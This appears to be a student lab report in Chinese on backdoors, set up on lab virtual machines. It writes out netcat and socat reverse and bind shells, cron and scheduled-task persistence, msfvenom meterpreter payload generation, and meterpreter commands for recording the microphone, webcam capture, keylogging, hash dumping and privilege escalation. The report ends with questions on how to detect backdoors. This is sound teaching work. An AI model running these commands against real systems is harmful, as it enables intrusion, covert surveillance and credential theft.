1. 程式人生 > 其它 >Exp2-後門原理與實踐

Exp2-後門原理與實踐

Exp2-後門原理與實踐

實驗內容 (4分+2分附加題)

(1)使用netcat獲取主機操作Shell,cron啟動 (1分)

(2)使用socat獲取主機操作Shell, 任務計劃啟動 (1分)

(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell(1分)

(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權 (1分)

(5)可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell(2分)加分內容一併寫入本實驗報告。
(評分者注意,附加分寫在評論裡,不要和主分數混在一起)

一、常用後門工具

​ 1.Netcat 、Socat系列

​ 2.Meterpreter

​ 3.Intersect

​ 4.CHAOS……

​ 本次實驗我們主要使用Netcat 、Socat系列以及Meterpreter。

二、實驗內容

(一)使用netcat獲取主機操作Shell,cron啟動

1.kali獲取windows虛擬機器的shell

(1)檢視kali虛擬機器的IP地址
ifconfig
(2)在kali虛擬機器中開啟監聽,埠號以學號為基礎指定
nc -l -p 11310
(3)windows反彈連線Linux,這裡首先在windows下進入ncat所在的資料夾,ip的地址為Linux的地址
ncat.exe -e cmd.exe 192.168.40.128 11310
(4)Linux下看到Windows的命令提示,驗證shell

2.Windows獲取kali虛擬機器的shell

(1)獲取Windows中的IP地址
ipconfig
(2)在ncat資料夾目錄下開啟監聽,埠選擇類學號數字
ncat.exe -l -p 11310
(3)Linux反彈連線win
nc 192.168.3.40 11310 -e /bin/sh

$$
/bin/sh是UNIX命令提供shell去執行shell命令
$$

(4)Windows獲得kali的shell,使用linux常用指令驗證
ls pwd whoami

3.cron啟動

Linux下進行
①Cron是Linux下的定時任務,每一分鐘執行一次,根據配置檔案執行預設的指令。
man cron
②crontab指令增加一條定時任務,"-e"表示編輯
crontab -e
③第一次編輯需要選擇,我們選擇2選項
④設定自啟動時間,每個小時的第12分鐘執行後面的指令
12 * * * * /bin/netcat 172.16.229.166 11310 -e /bin/sh
⑤在相應的時間節點開啟監聽,這裡我們選擇主機Windows

時間節點已經到,我們可以看見這裡window已經獲得了Linux的shell

(二)使用socat獲取主機操作Shell, 任務計劃啟動

1.Windows獲取kali虛擬機器的shell

(1)Kali開放11310埠
socat tcp-listen:11310 system:bash,pty,stderr
(2)Windows連線Kali虛擬機器,獲取終端,IP地址為Linux地址
socat - tcp:192.168.40.128:11310

注意:需要在socat檔案目錄中執行

(3)驗證終端功能,完全正常
ls pwd whoami

2.Kali獲取Windows虛擬機器的shell

(1)Windows開放11310埠
socat tcp-listen:11310 exec:cmd,pty,stderr 
(2)Kali機連線Windows獲取終端
socat - tcp:192.168.3.40:11310
(3)驗證shell,成功
dir

3.Windows下任務計劃啟動

(1)建立基本任務,在計算機管理的任務計劃程式中進行操作
(2)進行觸發器、操作的相關設定
(3)編輯操作時,在引數中寫上以下資料
tcp-listen:11310 exec:cmd,pty,stderr
(4)等待達到相應設計的時間進行觀察
(5)在Kali中進行socat連線,測試shell

(三)使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

1.Kali端生成後門可執行檔案

Kali執行以下程式碼

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -f exe > 20191310_backdoor.exe

2.利用ncat將後門檔案傳送到Windows下獲取終端

(1)在Windows的cmd下監聽11310埠,獲取後門檔案
ncat.exe -l 11310 > 20191310_backdoor.exe
(2)虛擬機器傳送後門檔案
nc 192.168.3.40 11310 < 20191310_backdoor.exe
(3)檢視傳送結果

傳送成功:

(4)MSF

①啟動msf

msfconsole

②進行相關設定

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 

③設定LHOST、LPORT

set LHOST 192.168.40.128
set LPORT 11310

(5)進行觸發

exploit

(5)Windows下進行操作,打開後門可執行檔案(可以用管理員身份執行)

(6)獲取shell終端,使用dir驗證,顯示成功

(四)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

1.獲取目標主機音訊

輸入以下指令

record_mic

2.獲取目標攝像頭內容

輸入以下指令

webcam_snap

3.獲取擊鍵記錄

keyscan_start//開始記錄
keyscan_dump//讀取

4.獲取截圖資訊

screenshot

5.嘗試提權

getsystem

根據此處部落格設定方法,最終提權成功,在此不再贅述(https://blog.csdn.net/redwand/article/details/107527710)

6.許多有趣的攻擊指令

	record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
    hashdump       Dumps the contents of the SAM database
    timestomp      Manipulate file MACE attributes
    shell		   getshell

(五)可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell

1.後門exe檔案方法

①生成exe可執行檔案
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -x pwn1 -f elf > pwn_exp2
②執行生成的檔案,注意必須先給生成的檔案以許可權
chmod +x pwn_exp2 *給許可權*
./pwn_exp2 | nc 192.168.3.40 11310 -e /bin/sh *執行檔案*
③Windows下監聽,獲取shell並使用以下指令驗證shell
ls whoami pwd

三、實驗總結與體會

​ 通過本次實驗,我學會了在理想情況下,也就是實驗情況下對linux和windows植入後門的操作,這算是我第一次對於後門的實踐,這裡麵包括開啟偵聽、反彈連線、生成和傳送後門程式、利用後門或者傳送的程式控制被控主機、修改定時任務列表、使用ncat的加強工具socat獲取主機操作Shell等。

​ 實驗過程中,已經完完全全體會到了攻擊者的“樂趣”和攻擊成功後的成就感,當看到我的電腦攝像頭自己閃光的時候,我想到了斯諾登揭露的那些事,原來這種技術我們就可以實現最簡單的實踐,這是何其真實和危險!

​ 網路安全有關國家安全,這次是真真切切讓我感受到了,網路的世界有多少深不可測的高手,網路的空間有多少實實在在的攻擊和巧妙的攻擊手段,資訊保安、網路安全絕對不容忽視!

​ 網路安全異常重要,網路對抗的實驗真真切切讓我學到了很多!我知道了後門的原理並且進行了簡單的實踐!

四、基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?

我能想到的是我們下載軟體的時候,採用的是一些方法連結,或者非官方渠道進行下載的話,這些我們下載的程式很有可能便被掛馬或者留下後門了,而且一定是經過精心設計的,這樣當我們使用這些程式軟體的時候,後門就進入到我們的系統了

(2)例舉你知道的後門如何啟動起來(win及linux)的方式?

後門修改了系統設定,將定時啟動管理器添加了定時的啟動引數

linux中crontab檔案被修改,週期性反向連線控制主機**

(3)Meterpreter有哪些給你映像深刻的功能?

生成的後門程式若在“理想情況”下可以偷偷錄影,偷偷拍照,偷偷幹好多事,非常有趣,但現在就是學習如何在現實狀況下突破防毒軟體、防火牆等等障礙實現後門

(4)如何發現自己有系統有沒有被安裝後門?

1.看防毒軟體的反饋,如360,火絨等

2.觀察系統的自啟動項

  1. 觀察工作管理員內的程序,看是否有異常程序和可疑程序
  2. 觀察任務計劃程式